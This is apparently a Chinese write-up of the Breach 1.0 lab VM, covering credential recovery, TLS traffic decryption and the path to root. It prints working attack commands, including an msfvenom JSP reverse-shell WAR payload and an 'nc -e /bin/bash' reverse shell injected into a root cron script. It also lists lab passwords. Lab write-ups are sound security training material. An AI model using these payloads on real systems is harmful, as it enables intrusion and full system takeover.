Breach 1.0 靶机

news2024/11/18 23:42:48

Breach 1.0

环境配置

  • 设置 VMware 上的仅主机模式网卡,勾选 DHCP 自动分配 IP,将子网改为 192.168.110.0/24

    image-20231020153422311

  • 将靶机和 kali 连接到仅主机网卡

信息搜集

存活检测

image-20231020165835393

详细扫描

后台网页扫描

image-20231020170040613

网页信息搜集

image-20231020170058373

image-20231020170128236

Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已委托其顶级顾问,由Bill Lumbergh、CISSP和Peter Gibbons、CjEH、SEC+、NET+、A+领导,对漏洞进行控制和分析。该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。
  • 查看源码发现疑似密文,并且有一个 herf 链接,点击胖子图片进行跳转

    image-20231020170750540

    Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
    
  • md5 解密

    cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
    

    image-20231020173011317

    再次解密

    pgibbons:damnitfeel$goodtobeagang$ta
    
  • 跳转的网页

    image-20231020170843459

  • 点击 employee portal 跳转到

    image-20231020173259352

  • 尝试使用刚刚解密出的值进行登录

    pgibbons
    damnitfeel$goodtobeagang$ta
    

    成功登录

    image-20231020173442067

  • 依次查询过滤有用信息

    最终在邮件中的第三封邮件中发现 “秘密证书” 字样

    并带有文件

    image-20231020174015307

  • 下载证书

    邮件上说把文件保存到这个网址

    尝试访问

    image-20231020174201646

  • 访问网页直接下载了 index.keystore 文件

    image-20231020174359224

  • 在 View Account 页面发现了一个流量包文件,下载

    并发现密码字样,密码为 tomcat

    image-20231020212823568

    image-20231020213435047

流量信息搜集

  • 使用 wireshark 打开文件,发现有许多 TLS 加密的报文

    image-20231020213752184

  • .keystore 密钥/证书

    .keystore文件是一种用于存储密钥和证书的二进制文件格式。

    常见的TLS证书格式包括:

    1. DER格式:以.der或.crt扩展名保存的证书文件,通常包含单个X.509证书。
    2. PEM格式:以.pem或.crt扩展名保存的证书文件,它使用Base64编码,并使用"-----BEGIN CERTIFICATE-----“和”-----END CERTIFICATE-----"标记来界定证书内容。PEM格式可以包含单个或多个X.509证书。

    在Keystore中,使用Java的keytool工具可以将DER或PEM格式的证书导入到JKS或PKCS#12格式的Keystore中。

    解密:

    keytool -importkeystore -srckeystore index.keystore -destkeystore breach.p12 -deststoretype pkcs12 -srcalias tomcat
     
    -importkeystore 导出keystore
     
    -srckeystore  源keystore文件
     
    -destkeystore  导出之后的证书存放路径
     
    -deststoretype  导出keystore之后的证书类型
     
    -srcalias 源alias
    

    成功生成证书文件

    image-20231020215004422

  • 将证书文件导入 wireshark

    image-20231020215728070

    image-20231020220256455

  • 查看数据包

    发现加密密文和一个网站,wireshark 已经将其解密了

    image-20231020221105881

  • 访问网站

    被浏览器的安全措施拦截

    image-20231020221439547

  • 使用 bp 代理,拦截,放包

    image-20231021130254880

  • 输入 wireshark 流量包解密的账号密码

    tomcat
    Tt\5D8F(#!*u=G)4m7zB
    

    image-20231021130324438

  • 成功登录进入Tomcat Manager 界面

    image-20231021130459816

webshell

  • 生成 .war 木马文件

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=8888 -f war > shell.war
    

    image-20231021131314929

  • 启动 msfconsole 并设置参数,开启监听

    mscconsole
    
    use exploit/multi/handler
    
    set LHOST 192.168.110.140
    set LPORT 8888
    run
    

    image-20231021131858531

  • 上传木马文件

    image-20231021132037962

  • 打开上传的文件

    image-20231021132235570

  • 反弹成功

    image-20231021132357541

提权

信息搜集

  • 尝试 sudo -l 失败

    image-20231021132537316

  • 尝试 suid 提权失败

    image-20231021132941361

  • 搜集系统中有用信息

    最终在 /var/www/5446 目录下发现了 php 文件,其中显示了数据库的 user 为 root,并且密码为空

    image-20231021133253227

数据库信息搜集

  • 在 mysql 数据库的 user 表中发现了数据库用户 milton 及加密的密码

    6450d89bd3aff1d893b85d3ad65d2ec2
    

    image-20231021134539827

  • 解密密码

    thelaststraw
    

    image-20231021134707886

  • 查看 /etc/passwd 文件也存在该用户

    尝试用其数据库密码进行登录

    image-20231021134847987

  • 成功登录

    image-20231021134939127

  • 尝试切换 blumbergh 用户

    image-20231021135854863

  • 提示需要密码

    image-20231021135953508

  • 查看用户密码文件

    image-20231021140108218

    发现了 Bill 字样

  • 在网页信息搜集时看到过 Bill 的图片

    下载图片,检测是否有隐写信息

    strings bill.png
    

    image-20231021140809165

  • 测试登录密码

    coffeestains
    

    image-20231021141030674

  • sudo -l 查看权限

    可以使用 tee 命令修改 tidup.sh

    image-20231021141116787

    tee 命令可将一个文件输出的内容输入到另一个文件

    读取 a.txt 中文本内容写入 file.txt

    cat a.txt | tee file.txt
    
  • 查看 tidup.sh 权限

    image-20231021151358661

  • 查看文件

    image-20231021164920861

    说这个脚本每三分钟自动运行一次

  • 创建一个文件写入命令 bash

    image-20231021153535615

  • 写入

    cat shell | sudo  tee /usr/share/cleanup/tidyup.sh
    

    image-20231021154045685

  • 失败,尝试使用 nc 反弹

    nc -e /bin/bash 192.168.110.129 7777
    

    image-20231021165711137

  • 监听,等待连接

    image-20231021165809751

    成功 root

    image-20231021170223329

总结

  • TLS 加密证书、.keystore 文件

  • 浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决

  • Tomcat Manager 上传 msf 生成的 .war 木马实现 webshell

  • tee

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1118187.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

二、UI入门

1. QWidget类 QWidget类是Qt所有图形用户界面(组件)的基类,因此QWidget类内部规定了所有最基础的UI相关功能。例如以下成员: ● width : const int 宽度(单位:像素,后文同) Qt中的…

基于SegFormer的改进语义分割该网络

摘要 场景解析是无人驾驶领域的一个关键任务,但是传统的语义分割网络往往只关注于提取更深层次的图像语义信息而忽略了全局信息对图像分割任务的重要性。另外随着图像在深层次卷积网络中的传递,卷积核天然的滤波作用会使得图像的边缘趋于平滑而丢失细节特…

2015年408真题复盘

紫色标记是认为有一定的思维难度或重点总结 红色标记是这次刷真题做错的 记录自己对题目的一些想法与联系,可能并不太关注题目本身。 分数用时 选择部分10/21 78/8036min大题部分总分 摘自知乎老哥:“我做历年真题时,绝大部分是130~139&#…

LVS负载均衡集群 (NAT模式)

LVS集群 集群的概念: 为解决某个特定的问题,将多个计算机组合起来形成一个单个系统 集群的水平扩展: 增加设备,并行运行多个服务,通过网路连接和算法来调度服务分配的问题 集群的类型: 负载均衡集群&#…

【斗罗二】冰帝两次险些杀死雨浩,天梦哥求助伊老遭拒绝,霍云儿现身救儿子

Hello,小伙伴们,我是小郑继续为大家深度解析绝世唐门。 斗罗大陆动画第二部绝世唐门已经更新了,霍雨浩与冰帝完美融合,成功觉醒了第二武魂,霍挂的时代正式到来。只是在整个第19集中,官方做了大量的改编,不但…

有湖有仓,如何升级到湖仓一体

很多企业在过去的 IT 基础建设过程中,都已经搭建了数据仓库或数据湖,或者两者都有。其中数据仓库一般使用的是传统 Oracle 或者传统 MPP 数据库,如 Teradata 和 Greenplum,数据湖使用 Hadoop 大数据平台。所以在考虑湖仓一体升级改…

ps插件Coolorus for Mac中文激活版

Coolorus是一款非常实用的Photoshop插件,它为Photoshop增加了色环配色面板,让设计师可以更直观地选择颜色。同时,Coolorus还提供了多种专业配色方案,如鲜艳色、复古色、日常色等,设计师可以直接套用这些方案&#xff0…

Power BI 傻瓜入门 1. 数据分析术语:Power BI风格

本章内容包括: 了解Power BI可以处理的不同类型的数据了解您的商业智能工具选项熟悉Power BI术语 数据无处不在。从你醒来的那一刻到你睡觉的时候,某个系统会代表你收集数据。即使在你睡觉的时候,也会产生与你生活的某些方面相关的数据。如…

计算机网络的七层结构、五层结构和四层结构

为什么要分层: 这个就和我们平常写程序一样,高内聚、低耦合。将网络进行分层我们就可以根据每一层的功能分开开发设计,将复杂的网络问题分解为更简单和清晰的小问题,方便设计、实现和标准化。无需在意其他层是如何实现的&#xff…

【框架源码篇 04】Spring源码手写篇-Bean定义配置化

Spring源码手写篇-Bean定义配置化 一、Bean定义配置分析 我们前面实现了手写IoC和AOP的功能,但是我们在使用的时候发现我们的调用代码还是非常的繁琐,会给应用者很不好的体验。 上面的代码很直观的看到重复代码很多,要用户设置的内容也很多&…

基于springboot实现学生综合测评系统项目【项目源码+论文说明】

基于springboot实现学生综合测评系统演示 摘要 随着信息化时代的到来,管理系统都趋向于智能化、系统化,学生综合测评系统也不例外,但目前国内仍都使用人工管理,学校规模越来越大,同时信息量也越来越庞大,人…

运营商大数据精准营销,击碎你的固化营销思维

大数据精准营销服务是大数据应用的典型场景之一,也是依托大数据和互联网提升企业效率的一种有效手段。但是,在选择大数据服务的很多时候,企业往往要考虑法律与合规的问题,其中比较重要的是数据获取渠道与数据是否脱敏。在所有大数…

CSS 两栏布局

目录 CSS两栏布局(左列定宽,右列自适应宽) 方法一:浮动margin 方法二:定位margin 方法三:浮动BFC 方法四:Flex布局 方法五:able布局 CSS两栏布局(左列不定宽&#…

一、Qt简介

1. 什么是Qt? Qt是一个基于C的图形用户界面(GUI)开发框架,但图形用户界面并不是Qt的全部,因为Qt还包含了很多非图形化的开发功能:多线程、数据库、图像图形处理、音视频处理、网络通信、文件IO等。 一方面…

【智慧工地源码】基于AI视觉技术赋能智慧工地

伴随着技术的不断发展,信息化手段、移动技术、智能穿戴及工具在工程施工阶段的应用不断提升,智慧工地概念应运而生,庞大的建设规模催生着智慧工地的探索和研发。 建筑施工具有周期长、环境复杂、工序繁杂、人员流动性大等特点,所以…

10个基于.Net开发的Windows开源软件项目

分享10个适合程序员的神器,都是基于.Net开发的,可以用来学习,日常工作也可以使用。(点击标题,查看详情) 1、基于.NET的强大文件格式开源转换工具 一个基于.NET平台的开源文件格式转换工具,可以…

仿写el-upload组件,彻底搞懂文件上传

用了那么久的Upload组件,你知道是怎么实现的么,今天就来仿写一个饿了么el-upload vue组件,彻底搞懂前端的文件上传相关知识! 要实现的props 参数说明action必选参数,上传的地址headers设置上传的请求头部multiple是否…

Linux内存管理(2):memblock

一、memblock分配器初始化 在内核初始化过程中也需要分配内存,使用的页帧分配器叫memblock(早期的内核版本使用BootMem,新版本内核已不再用)。 memblock是系统启动过程中的一个中间阶段的内存管理, 负责在系统上电到内核内存管理模型初始化之前这段时间的物理内存分配、预留…

mac 升级node到指定版本

node版本14.15.1升级到最新稳定版18.18.2 mac系统 先查看一下自己的node版本 node -v开始升级 第一步 清除node的缓存 sudo npm cache clean -f第二步 安装n模块【管理模块 n是管理 nodejs版本】 sudo npm install -g n第三步升级node sudo n stable // 把当前系统的 Node…

C++初阶(五)类和对象

文章目录 一、C两大类型二、类的6个默认成员函数三、构造函数1、概念2、特性1、构造函数自动调用特性演示2、无参有参调用两种情况演示3、函数重载演示4、默认构造函数组成及演示5、内置类型成员不初始化的补丁演示 3、析构函数1、概念2、特性1、代码演示2、析构两种情况 4、构…